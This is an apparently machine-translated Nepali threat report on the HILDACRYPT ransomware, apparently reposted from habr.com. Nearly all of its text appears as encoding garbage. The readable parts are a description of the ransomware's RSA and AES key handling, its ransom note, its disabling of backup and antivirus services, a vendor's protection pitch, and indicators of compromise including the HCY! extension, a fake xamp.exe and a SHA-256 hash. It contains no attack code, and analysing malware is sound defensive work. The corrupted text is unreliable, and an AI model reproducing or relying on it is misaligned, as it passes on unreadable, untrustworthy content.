AES рдлрд╛рдЗрд▓ рдХреБрдЮреНрдЬреА рдЗрдиреНрдХреНрд░рд┐рдкреНрдЯ рдЧрд░реНрди RSA рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдЮреНрдЬреА рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдЫред RSA рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдЮреНрдЬреА Base64 рдЗрдиреНрдХреЛрдб рдЧрд░рд┐рдПрдХреЛ рдЫ рд░ рдпрд╕рдорд╛ рдореЛрдбреБрд▓рд╕ рд░ 65537 рдХреЛ рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдПрдХреНрд╕рдкреЛрдирдиреНрдЯ рд╣реБрдиреНрдЫред рдбрд┐рдХреНрд░рд┐рдкреНрд╢рдирд▓рд╛рдИ RSA рдирд┐рдЬреА рдХреБрдЮреНрдЬреА рдЪрд╛рд╣рд┐рдиреНрдЫ, рдЬреБрди рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛рд╕рдБрдЧ рдЫред
RSA рдЗрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдкрдЫрд┐, AES рдХреБрдЮреНрдЬреАрд▓рд╛рдИ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдорд╛ рднрдгреНрдбрд╛рд░рдг рдЧрд░рд┐рдПрдХреЛ Base64 рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдЗрдиреНрдХреЛрдб рдЧрд░рд┐рдПрдХреЛ рдЫред
рдлрд┐рд░реМрддреА рд╕рдиреНрджреЗрд╢
рдЗрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдкреВрд░рд╛ рднрдПрдкрдЫрд┐, HILDACRYPT рд▓реЗ HTML рдлрд╛рдЗрд▓рд▓рд╛рдИ рдлреЛрд▓реНрдбрд░рдорд╛ рд▓реЗрдЦреНрдЫ рдЬрд╕рдорд╛ рдпрд╕рд▓реЗ рдлрд╛рдЗрд▓рд╣рд░реВ рдЗрдиреНрдХреНрд░рд┐рдкреНрдЯ рдЧрд░реЗрдХреЛ рдерд┐рдпреЛред ransomware рд╕реВрдЪрдирд╛рд▓реЗ рджреБрдИ рдЗрдореЗрд▓ рдареЗрдЧрд╛рдирд╛рд╣рд░реВ рд╕рдорд╛рд╡реЗрд╢ рдЧрд░реНрджрдЫ рдЬрд╣рд╛рдБ рдкреАрдбрд┐рддрд▓реЗ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓рд╛рдИ рд╕рдореНрдкрд░реНрдХ рдЧрд░реНрди рд╕рдХреНрдЫред
рдлрд┐рд░реМрддреА рд╕реВрдЪрдирд╛рдорд╛ "рдиреЛ рд▓реЛрд▓реА рд╕реБрд░рдХреНрд╖рд┐рдд рдЫреИрди;)" рд▓рд╛рдИ рдкрдирд┐ рд╕рдорд╛рд╡реЗрд╢ рдЧрд░рд┐рдПрдХреЛ рдЫ - рдЬрд╛рдкрд╛рдирдорд╛ рдкреНрд░рддрд┐рдмрдиреНрдзрд┐рдд рд╕рд╛рдирд╛ рдХреЗрдЯреАрд╣рд░реВрдХреЛ рдЙрдкрд╕реНрдерд┐рддрд┐рдХреЛ рд╕рд╛рде рдПрдирд┐рдореЗ рд░ рдордВрдЧрд╛ рдХреНрдпрд╛рд░реЗрдХреНрдЯрд░рд╣рд░реВрдХреЛ рд╕рдиреНрджрд░реНрднред
рдирд┐рд╖реНрдХрд░реНрд╖рдорд╛
HILDACRYPT, рдПрдХ рдирдпрд╛рдБ ransomware рдкрд░рд┐рд╡рд╛рд░, рдирдпрд╛рдБ рд╕рдВрд╕реНрдХрд░рдг рдЬрд╛рд░реА рдЧрд░реЗрдХреЛ рдЫред рдЗрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдореЛрдбреЗрд▓рд▓реЗ рдкреАрдбрд┐рддрд▓рд╛рдИ ransomware рджреНрд╡рд╛рд░рд╛ рдЗрдиреНрдХреНрд░рд┐рдкреНрдЯ рдЧрд░рд┐рдПрдХрд╛ рдлрд╛рдЗрд▓рд╣рд░реВ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдЧрд░реНрдирдмрд╛рдЯ рд░реЛрдХреНрдЫред рдХреНрд░рд┐рдкреНрдЯреЛрд▓реЛрдХрд░рд▓реЗ рдмреНрдпрд╛рдХрдЕрдк рдкреНрд░рдгрд╛рд▓реА рд░ рдПрдиреНрдЯрд┐рднрд╛рдЗрд░рд╕ рд╕рдорд╛рдзрд╛рдирд╣рд░реВрд╕рдБрдЧ рд╕рдореНрдмрдиреНрдзрд┐рдд рд╕реБрд░рдХреНрд╖рд╛ рд╕реЗрд╡рд╛рд╣рд░реВ рдЕрд╕рдХреНрд╖рдо рдЧрд░реНрди рд╕рдХреНрд░рд┐рдп рд╕реБрд░рдХреНрд╖рд╛ рд╡рд┐рдзрд┐рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫред HILDACRYPT рдХрд╛ рд▓реЗрдЦрдХ Netflix рдорд╛ рджреЗрдЦрд╛рдЗрдПрдХреЛ рдПрдирд┐рдореЗрдЯреЗрдб рд╢реНрд░реГрдВрдЦрд▓рд╛ Hilda рдХреЛ рдкреНрд░рд╢рдВрд╕рдХ рд╣реБрдиреБрд╣реБрдиреНрдЫ, рдЬрд╕рдХреЛ рдЯреНрд░реЗрд▓рд░рдХреЛ рд▓рд┐рдЩреНрдХ рдХрд╛рд░реНрдпрдХреНрд░рдордХреЛ рдЕрдШрд┐рд▓реНрд▓реЛ рд╕рдВрд╕реНрдХрд░рдгрдХреЛ рд▓рд╛рдЧрд┐ рдЦрд░рд┐рдж рдкрддреНрд░рдорд╛ рд╕рдорд╛рд╡реЗрд╢ рдерд┐рдпреЛред
рд╕рд╛рдорд╛рдиреНрдп рдЬрд╕реНрддреЛ, ╨╕ рддрдкрд╛рдИрдВрдХреЛ рдХрдореНрдкреНрдпреБрдЯрд░рд▓рд╛рдИ HILDACRYPT ransomware рдмрд╛рдЯ рдЬреЛрдЧрд╛рдЙрди рд╕рдХреНрдЫ, рд░ рдкреНрд░рджрд╛рдпрдХрд╣рд░реВрд╕рдБрдЧ рдЖрдлреНрдирд╛ рдЧреНрд░рд╛рд╣рдХрд╣рд░реВрд▓рд╛рдИ рд╕реБрд░рдХреНрд╖рд╛ рдЧрд░реНрдиреЗ рдХреНрд╖рдорддрд╛ рдЫред ред рд╕рдВрд░рдХреНрд╖рдг рдпреА рд╕рдорд╛рдзрд╛рдирд╣рд░реВ рд╕рдорд╛рд╡реЗрд╢ рддрдереНрдп рджреНрд╡рд╛рд░рд╛ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдЧрд░рд┐рдПрдХреЛ рдЫ рдмреНрдпрд╛рдХрдЕрдк рдорд╛рддреНрд░ рд╣реЛрдЗрди, рд╣рд╛рдореНрд░реЛ рдПрдХреАрдХреГрдд рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рдгрд╛рд▓реА рдкрдирд┐ рд╕рдорд╛рд╡реЗрд╢ рдЧрд░реНрджрдЫ - рдореЗрд╕рд┐рди рд▓рд░реНрдирд┐рдЩ рдореЛрдбреЗрд▓рджреНрд╡рд╛рд░рд╛ рд╕рдЮреНрдЪрд╛рд▓рд┐рдд рд░ рд╡реНрдпрд╡рд╣рд╛рд░рд┐рдХ рд╣реЗрд░рд┐рд╕реНрдЯрд┐рдХреНрд╕рдорд╛ рдЖрдзрд╛рд░рд┐рдд, рдПрдЙрдЯрд╛ рдкреНрд░рд╡рд┐рдзрд┐ рдЬрд╕рд▓реЗ рд╢реВрдиреНрдп-рджрд┐рдирдХреЛ ransomware рдХреЛ рдЦрддрд░рд╛рд▓рд╛рдИ рдЕрд░реВ рдХреБрдиреИ рдЬрд╕реНрддреЛ рдирднрдИ рдкреНрд░рддрд┐рд░реЛрдз рдЧрд░реНрди рд╕рдХреНрд╖рдо рдЫред
рд╕рдордЭреМрддрд╛ рдХреЛ рд╕рдВрдХреЗрддрдХ
рдлрд╛рдЗрд▓ рд╡рд┐рд╕реНрддрд╛рд░ HCY!
HILDACRYPReadMe.html
xamp.exe рдПрдЙрдЯрд╛ рдЕрдХреНрд╖рд░ "p" рднрдПрдХреЛ рд░ рдХреБрдиреИ рдбрд┐рдЬрд┐рдЯрд▓ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдЫреИрди
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
рд╕реНрд░реЛрдд: www.habr.com